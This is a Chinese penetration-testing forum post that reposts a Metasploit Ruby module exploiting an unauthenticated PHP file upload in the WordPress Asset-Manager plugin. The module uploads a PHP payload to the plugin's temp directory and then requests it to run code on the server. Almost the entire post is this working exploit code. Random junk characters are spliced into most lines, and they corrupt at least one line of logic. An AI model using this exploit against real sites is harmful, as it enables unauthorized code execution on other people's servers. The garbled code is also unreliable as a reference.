找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2410|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。+ e# E; a3 L4 [
0 O5 @; O) o+ s: W  y
##
0 @& g7 y. @6 D( s( f& x# This file is part of the Metasploit Framework and may be subject to; s5 T8 E. H2 ~  K1 \7 \1 l
# redistribution and commercial restrictions. Please see the Metasploit; d3 |8 r" Q: k; _# W- W
# Framework web site for more information on licensing and terms of use.: I& y" }, n/ W7 j( A- F
#   http://metasploit.com/framework// F* Y$ b& B" l1 e* @$ V7 U) q& U, l
##: G" p. }9 X( A3 _2 G3 \/ w0 f

$ F# `' R3 J- i( o5 b, F# rrequire 'msf/core'
! J1 a# U/ P/ [$ urequire 'msf/core/exploit/php_exe'
! L) q# U% v  J$ z$ @: N 3 U9 B# Q3 a, r* x
class Metasploit3 < Msf::Exploit::Remote
1 {9 O: S$ o% v/ a  Rank = ExcellentRanking- o" e# ^& ^1 i8 U# x5 g
2 {/ O8 q4 j: w
  include Msf::Exploit::Remote::HttpClient
* q& R0 k  x8 Z  include Msf::Exploit:hpEXE/ ]7 i. [7 q0 Q: c
4 E4 G( V" C4 k2 Q/ ?" q
  def initialize(info = {})
, w+ Z4 H( U3 y5 Q# U0 g    super(update_info(info,
# `. ]6 r6 ~, [. p7 s* a      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',8 }9 `# i+ U- b) n. \' i
      'Description'    => %q{2 c% \: j7 n' W  S: {5 X  u4 L
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
8 q& r+ ?' Y4 w        plugin.  By abusing the upload.php file, a malicious user can upload a file to a# z) z4 i! a" e! ?0 `0 k0 g3 h
        temp directory without authentication, which results in arbitrary code execution./ r) B. g0 P/ n  X' h  v. D; z0 S
      },
# e  g8 z3 l  a$ D% K      'Author'         =>8 {$ ]8 Y- L5 s  E0 U
        [
, B: |9 R) r- e0 ?: }" m+ {* C          'Sammy FORGIT', # initial discovery
. Z3 S  `6 q! N* a# X; N          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
% D( m8 K# h4 S3 y  ^2 o3 |8 e1 Q        ],/ H: N# A6 x- Z  c$ Z, j4 G+ m) h
      'License'        => MSF_LICENSE,
9 A/ x' t2 f0 B& p8 C- e1 N      'References'     =>
* ]" G' H8 k- o7 g        [5 G& h# l1 J9 G4 V9 J, u; t
          [ 'OSVDB', '82653' ],: k5 Q! Q( s4 t% ]% L" U% h
          [ 'BID', '53809' ],
! Z' h3 L8 ]/ f. f2 k) d, W7 v          [ 'EDB', '18993' ],! C* w' M2 N# o0 f) J) d
          [ 'URL', 'http:// www.myhack58.com /' ]
! r/ S/ U! {$ ]: \' b        ],3 T! H. ^, y8 V( [" }, |- u
      'Payload'       =>
4 q" @; b3 o; F' q" f% m        {
, }9 U+ D) K% M  q5 a7 h2 ~2 V          'BadChars' => "\x00",
) t" P- s/ g6 Y& _& d' J        }," r2 @9 ]8 j5 _4 q
      'Platform'       => 'php',
! k3 @1 Z7 p. K# m+ Y      'Arch'           => ARCH_PHP,2 }9 C9 ?  f+ z0 }. ^4 s
      'Targets'        =>7 d/ \4 F& U3 M# ?8 k/ ^
        [3 A. a" b0 H+ W% G* E
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
$ J/ N) B/ y! q2 R          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]* c8 ?! ?; N6 E" u
        ],
4 P0 @& e& d  b1 T1 X      'DefaultTarget' => 0,
) y8 m) x. b- L' G% A1 z! g      'DisclosureDate' => 'May 26 2012'))
1 V0 w: J4 {8 w: m6 Z; t* }
8 L) N" H  w& A* w: {    register_options(
6 x! N8 _% Z% Z( A. s      [
0 ?% R) @2 P9 [& h        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])( h6 a; W" }5 e$ M3 f" W' M
      ], self.class)
3 o( V$ z$ ], L  end
0 T& M- H: ~! S# d" }: f$ a
- G( i% o& _" ^. H  def exploit" S2 \2 Z2 g& L  _. F
    uri =  target_uri.path
/ u) Z% R3 J. F2 q5 Q    uri << '/' if uri[-1,1] != '/'
( j& |) s' G7 O4 g. R8 T0 ~    peer = "#{rhost}:#{rport}"4 U% |0 b5 G$ b8 C0 B% s2 J
    payload_name = "#{rand_text_alpha(5)}.php"% @3 @& ?7 \$ o6 C/ Y
    php_payload = get_write_exec_payload(:unlink_self=>true)
! f' P/ \8 [4 g1 M$ n1 K- ~1 H
+ U/ o1 g3 y. \9 y% e    data = Rex::MIME::Message.new; b- n0 U1 d6 m4 X3 F3 m$ I1 k" J
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")& I5 J5 l3 w, _
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')! ]0 N, D7 o# u9 }/ m

+ W" F5 y% f% b' @% _* g1 D    print_status("#{peer} - Uploading payload #{payload_name}"), }1 f7 n2 D1 D- L& O: P3 U
    res = send_request_cgi({7 O1 N; {4 I, |
      'method'  => 'POST',
. q  u7 Q3 J* K' P6 M- ]      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",# y) z, L5 Q$ d: V) }% L- n
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",5 c$ C+ n1 s$ d1 ?
      'data'    => post_data  r1 ?2 Y( b  B5 P. t  k
    })) u2 |  {, A; H; ]" m( B

: d  Q" E+ G5 Z& T    if not res or res.code != 200 or res.body !~ /#{payload_name}/
8 ~: k6 ~2 E/ U9 W. Q* e5 i0 k2 k      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")2 x9 D/ `+ l& z/ U1 `
end
" U! P5 x' e4 C- a0 c + X5 W1 W6 X3 Y! q% z
    print_status("#{peer} - Executing payload #{payload_name}")% Z9 u; I7 B/ R' s& h! l
    res = send_request_raw({
) t7 n" P: k1 g" z  F8 l      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",7 d& I" P' l# t4 B/ M0 P  b( a
      'method'  => 'GET'
! N+ a, X, O  O6 A( O# O    })# M9 u+ D2 _) k& _$ x1 n/ f

5 T2 L) \9 z/ W8 y( ^  w    if res and res.code != 2008 d+ @; n' z" }/ K, b
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed"), Q* V& O; Q2 V6 u
    end
+ F+ `$ J5 _, W" K  end- I1 J, m9 E0 c2 R) ?3 v- S* q
end1 u& c: e" [/ x8 x3 f$ U) `8 z4 {# U
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表